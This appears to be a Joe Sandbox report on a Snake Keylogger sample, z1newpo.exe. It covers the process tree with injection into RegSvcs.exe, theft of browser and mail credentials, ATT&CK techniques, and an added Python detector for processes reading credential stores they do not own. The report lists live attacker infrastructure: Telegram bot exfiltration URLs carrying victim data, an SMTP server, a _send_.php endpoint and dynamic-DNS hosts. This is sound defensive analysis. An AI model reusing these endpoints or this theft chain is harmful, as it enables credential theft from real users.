GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
Source: name.exe | Binary or memory string: WIN_XPe
Source: name.exe | Binary or memory string: WIN_VISTA
Source: name.exe | Binary or memory string: WIN_7
Source: name.exe | Binary or memory string: WIN_8
Source: Yara match | File source: 3.2.RegSvcs.exe.370000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.name.exe.12d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.name.exe.ba0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.name.exe.ba0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.name.exe.12d0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3684808762.00000000003AD000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: name.exe PID: 788, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 3636, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: name.exe PID: 6540, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 6480, type: MEMORYSTR
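The "File opened" and "Key opened" lines above are the credential-theft behaviour behind the "Tries to harvest and steal browser information" and "Tries to steal Mail credentials" verdicts: the injected RegSvcs.exe reads the Chrome and Edge Login Data, Web Data, Cookies, History and Top Sites databases, the Postbox profile directory and the Outlook MAPI profile key 9375CFF0413111d3B88A00104B2A6676. The distinguishing signal is not any single read (backup agents and AV scanners also touch these files) but a process that does not own a store reading several different stores. The checker below is an added example, not the report's own logic: the access events are constructed from the report's lines plus one benign control row, and the owner-process names per store are assumptions to adjust for the browsers and mail clients deployed in a given environment.

```python
"""Flag non-owner processes reading browser and mail credential stores.

Added example (not part of the Joe Sandbox report): the file/registry access
events below are constructed from the report's "File opened" and "Key opened"
lines for RegSvcs.exe, plus one benign control row for chrome.exe.
"""
import ntpath
import re
from collections import defaultdict

BROWSER_FILES = r"(Login Data|Web Data|History|Top Sites|Network\\Cookies)$"

# (pattern over the accessed path, store name, processes assumed to own it)
STORES = [
    (re.compile(r"\\Google\\Chrome\\User Data\\[^\\]+\\" + BROWSER_FILES, re.I),
     "chrome", {"chrome.exe"}),
    (re.compile(r"\\Microsoft\\Edge\\User Data\\[^\\]+\\" + BROWSER_FILES, re.I),
     "edge", {"msedge.exe"}),
    (re.compile(r"\\AppData\\Roaming\\PostboxApp\\Profiles\\", re.I),
     "postbox", {"postbox.exe"}),
    # MAPI profile key queried for stored mail account settings.
    (re.compile(r"\\Windows Messaging Subsystem\\Profiles\\Outlook\\"
                r"9375CFF0413111d3B88A00104B2A6676$", re.I),
     "outlook_profile", {"outlook.exe"}),
]

REGSVCS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

# Constructed access events (Image = acting process, Target = file path or registry key).
EVENTS = [
    {"Image": REGSVCS,
     "Target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"Image": REGSVCS,
     "Target": r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies"},
    {"Image": REGSVCS,
     "Target": "C:\\Users\\user\\AppData\\Roaming\\PostboxApp\\Profiles\\"},
    {"Image": REGSVCS,
     "Target": r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion"
               r"\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676"},
    # Benign control (constructed): the browser reading its own store.
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "Target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
]


def store_for(target: str):
    """Return (store name, owner process names) if target is a known credential store."""
    for pattern, name, owners in STORES:
        if pattern.search(target):
            return name, owners
    return None


def check_event(event: dict):
    """Return (process, store) when a non-owner touches a store, else None."""
    match = store_for(event["Target"])
    if match is None:
        return None
    store, owners = match
    proc = ntpath.basename(event["Image"]).lower()
    return None if proc in owners else (proc, store)


def harvesting_processes(events: list, min_stores: int = 2) -> dict:
    """Processes that read at least min_stores distinct stores they do not own.

    One foreign read can be a backup agent or an AV scan; several different
    stores from a single process is the stealer pattern seen in this report.
    """
    touched = defaultdict(set)
    for event in events:
        hit = check_event(event)
        if hit:
            touched[hit[0]].add(hit[1])
    return {proc: sorted(stores) for proc, stores in touched.items()
            if len(stores) >= min_stores}


if __name__ == "__main__":
    print(harvesting_processes(EVENTS))
```

On the report's events this returns RegSvcs.exe with all four stores; the same browser file opened by chrome.exe is ignored, and a single foreign read stays below the threshold.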

Remote Access Functionality

Source: Yara match | File source: 0000000D.00000002.3689181352.0000000002631000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3688609885.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 3.2.RegSvcs.exe.370000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.name.exe.12d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.name.exe.ba0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.name.exe.ba0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.name.exe.12d0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3684808762.000000000037C000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: name.exe PID: 788, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 3636, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: name.exe PID: 6540, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 6480, type: MEMORYSTR
Source: Yara match | File source: 3.2.RegSvcs.exe.370000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.name.exe.12d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.name.exe.ba0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.name.exe.ba0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.name.exe.12d0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.3688609885.00000000027A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3684808762.000000000037C000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.3689181352.0000000002823000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: name.exe PID: 788, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 3636, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: name.exe PID: 6540, type: MEMORYSTR
Source: C:\Users\user\Desktop\z1newpo.exe | Code function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
Source: C:\Users\user\Desktop\z1newpo.exe | Code function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
Source: C:\Users\user\Desktop\z1newpo.exe | Code function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3
Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 2_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,2_2_004652BE
Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 2_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_00476619
Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 2_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,2_2_0046CEF3
Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 12_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,12_2_004652BE
Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 12_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,12_2_00476619
Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 12_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,12_2_0046CEF3
ATT&CK matrix (tactic columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact). The matrix was flattened by extraction and is rebuilt here per tactic, keeping only the cells the report marks with a match-count badge; the digit string in front of each technique is that badge as extracted, and unmarked template cells (Cron, VNC, /etc/passwd and the like) are omitted.

Reconnaissance: no matched techniques
Resource Development: 111 Scripting
Initial Access: 2 Valid Accounts
Execution: 2 Native API
Persistence: 111 Scripting; 1 DLL Side-Loading; 2 Valid Accounts; 2 Registry Run Keys / Startup Folder
Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 212 Process Injection; 2 Registry Run Keys / Startup Folder
Defense Evasion: 11 Disable or Modify Tools; 11 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 1 DLL Side-Loading; 11 Masquerading; 2 Valid Accounts; 11 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 212 Process Injection
Credential Access: 1 OS Credential Dumping; 21 Input Capture
Discovery: 2 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 117 System Information Discovery; 221 Security Software Discovery; 11 Virtualization/Sandbox Evasion; 2 Process Discovery; 11 Application Window Discovery; 1 System Owner/User Discovery; 1 System Network Configuration Discovery
Lateral Movement: no matched techniques
Collection: 11 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 21 Input Capture; 3 Clipboard Data
Command and Control: 1 Web Service; 4 Ingress Tool Transfer; 11 Encrypted Channel; 1 Non-Standard Port; 3 Non-Application Layer Protocol; 24 Application Layer Protocol
Exfiltration: no matched techniques
Impact: 1 System Shutdown/Reboot
Behavior Graph ID: 1513179 | Sample: z1newpo.exe | Start date: 18/09/2024 | Architecture: WINDOWS | Score: 100

Contacted hosts (graph root): reallyfreegeoip.org; api.telegram.org; 3 other IPs or domains
Signatures on the root: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 11 other signatures
Signatures on hosts: Tries to detect the country of the analysis system (by using the IP) [reallyfreegeoip.org]; Uses the Telegram API (likely for C&C communication) [api.telegram.org]

Process tree as drawn in the graph (numbers after a process name are the graph's created-file / registry-value badges):

z1newpo.exe (3)
    dropped: C:\Users\user\AppData\Local\...\name.exe, PE32
    -> name.exe (1)
        dropped: C:\Users\user\AppData\Roaming\...\name.vbs, data
        signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 2 other signatures
        -> RegSvcs.exe (15, 2)
            api.telegram.org 149.154.167.220, port 443 (local ports 49726, 49739), TELEGRAMRU, United Kingdom
            us2.smtp.mailhostbox.com 208.91.198.143, port 587 (local ports 49732, 49740), PUBLIC-DOMAIN-REGISTRYUS, United States
            2 other IPs or domains
wscript.exe (1)
    signature: Windows Scripting host queries suspicious COM object (likely to drop second stage)
    -> name.exe
        signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process
        -> RegSvcs.exe (2)
            signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)

Source | Detection | Scanner | Label
z1newpo.exe | 74% | ReversingLabs | Win32.Spyware.Snakekeylogger
z1newpo.exe | 100% | Avira | HEUR/AGEN.1321293
z1newpo.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\directory\name.exe | 100% | Avira | HEUR/AGEN.1321293
C:\Users\user\AppData\Local\directory\name.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\directory\name.exe | 74% | ReversingLabs | Win32.Spyware.Snakekeylogger

No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe
https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe
http://checkip.dyndns.org | 0% | URL Reputation | safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
https://reallyfreegeoip.org/xml/8.46.123.33 | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
http://varders.kozow.com:8081 | 0% | URL Reputation | safe
http://aborters.duckdns.org:8081 | 100% | URL Reputation | malware
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
http://checkip.dyndns.org/ | 0% | URL Reputation | safe
http://51.38.247.67:8081/_send_.php?L | 0% | URL Reputation | safe
https://reallyfreegeoip.org/xml/8.46.123.33$ | 0% | URL Reputation | safe
http://anotherarmy.dns.army:8081 | 100% | URL Reputation | malware
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
http://checkip.dyndns.org/q | 0% | URL Reputation | safe
https://reallyfreegeoip.org | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded | 0% | URL Reputation | safe
https://reallyfreegeoip.org/xml/ | 0% | URL Reputation | safe
https://api.telegram.org/bot | 0% | Avira URL Cloud | safe
https://www.office.com/ | 0% | Avira URL Cloud | safe
https://api.telegram.org | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2019/09/2024%20/%2002:45:27%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | 0% | Avira URL Cloud | safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Avira URL Cloud | safe
http://us2.smtp.mailhostbox.com | 0% | Avira URL Cloud | safe
https://www.office.com/lB | 0% | Avira URL Cloud | safe
https://chrome.google.com/webstore?hl=en | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot/sendMessage?chat_id=&text= | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2019/09/2024%20/%2004:52:17%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | 0% | Avira URL Cloud | safe
https://chrome.google.com/webstore?hl=enlB | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20a | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
us2.smtp.mailhostbox.com | 208.91.198.143 | true | true | | unknown
reallyfreegeoip.org | 188.114.96.3 | true | true | | unknown
api.telegram.org | 149.154.167.220 | true | true | | unknown
checkip.dyndns.com | 132.226.8.169 | true | false | | unknown
checkip.dyndns.org | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2019/09/2024%20/%2002:45:27%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | Avira URL Cloud: safe | unknown
https://reallyfreegeoip.org/xml/8.46.123.33 | false | URL Reputation: safe | unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2019/09/2024%20/%2004:52:17%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | Avira URL Cloud: safe | unknown
http://checkip.dyndns.org/ | false | URL Reputation: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.office.com/ | RegSvcs.exe, 0000000D.00000002.3689181352.00000000027E9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/chrome_newtab | RegSvcs.exe, 00000003.00000002.3691195829.00000000035D1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/ac/?q= | RegSvcs.exe, 00000003.00000002.3691195829.00000000035D1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org | RegSvcs.exe, 00000003.00000002.3688609885.0000000002694000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002716000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | RegSvcs.exe, 00000003.00000002.3691195829.00000000035D1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.telegram.org/bot | name.exe, 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3688609885.0000000002694000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3684808762.000000000037C000.00000040.80000000.00040000.00000000.sdmp, name.exe, 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002716000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://us2.smtp.mailhostbox.com | RegSvcs.exe, 00000003.00000002.3688609885.00000000027B0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002833000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.office.com/lB | RegSvcs.exe, 00000003.00000002.3688609885.0000000002771000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.00000000027F3000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | RegSvcs.exe, 00000003.00000002.3691195829.00000000035D1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://checkip.dyndns.org | RegSvcs.exe, 00000003.00000002.3688609885.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002631000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | RegSvcs.exe, 00000003.00000002.3691195829.00000000035D1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3691769628.0000000003653000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text= | RegSvcs.exe, 00000003.00000002.3688609885.0000000002694000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002716000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://chrome.google.com/webstore?hl=en | RegSvcs.exe, 0000000D.00000002.3689181352.00000000027B8000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | RegSvcs.exe, 00000003.00000002.3691195829.00000000035D1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3691769628.0000000003653000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://varders.kozow.com:8081 | name.exe, 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3684808762.000000000037C000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3688609885.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, name.exe, 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002631000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://aborters.duckdns.org:8081 | name.exe, 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3684808762.000000000037C000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3688609885.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, name.exe, 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002631000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
https://ac.ecosia.org/autocomplete?q= | RegSvcs.exe, 00000003.00000002.3691195829.00000000035D1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3691769628.0000000003653000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://51.38.247.67:8081/_send_.php?L | RegSvcs.exe, 00000003.00000002.3688609885.00000000027A0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002823000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://reallyfreegeoip.org/xml/8.46.123.33$ | RegSvcs.exe, 00000003.00000002.3688609885.0000000002629000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3688609885.000000000266F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3688609885.0000000002694000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002716000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.00000000026EF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.00000000026AA000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://anotherarmy.dns.army:8081 | name.exe, 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3684808762.000000000037C000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3688609885.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, name.exe, 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002631000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | RegSvcs.exe, 00000003.00000002.3691195829.00000000035D1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3691769628.0000000003653000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://checkip.dyndns.org/q | name.exe, 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3684808762.000000000037C000.00000040.80000000.00040000.00000000.sdmp, name.exe, 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://chrome.google.com/webstore?hl=enlB | RegSvcs.exe, 00000003.00000002.3688609885.000000000273F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.00000000027C2000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://reallyfreegeoip.org | RegSvcs.exe, 00000003.00000002.3688609885.000000000266F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3688609885.0000000002694000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3688609885.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002716000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.000000000267F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.00000000026EF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RegSvcs.exe, 00000003.00000002.3688609885.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002631000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | RegSvcs.exe, 00000003.00000002.3691195829.00000000035D1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3691769628.0000000003653000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20a | RegSvcs.exe, 00000003.00000002.3688609885.0000000002694000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002716000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded | name.exe, 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3684808762.000000000037C000.00000040.80000000.00040000.00000000.sdmp, name.exe, 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://reallyfreegeoip.org/xml/ | name.exe, 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3688609885.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3684808762.000000000037C000.00000040.80000000.00040000.00000000.sdmp, name.exe, 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.000000000267F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
132.226.8.169 | checkip.dyndns.com | United States | 16989 | UTMEMUS | false
208.91.198.143 | us2.smtp.mailhostbox.com | United States | 394695 | PUBLIC-DOMAIN-REGISTRYUS | true
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true
188.114.96.3 | reallyfreegeoip.org | European Union | 13335 | CLOUDFLARENETUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1513179
Start date and time: 2024-09-18 15:25:06 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 22s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 20
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: z1newpo.exe
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winEXE@10/3@4/4
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 54
• Number of non-executed functions: 309
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
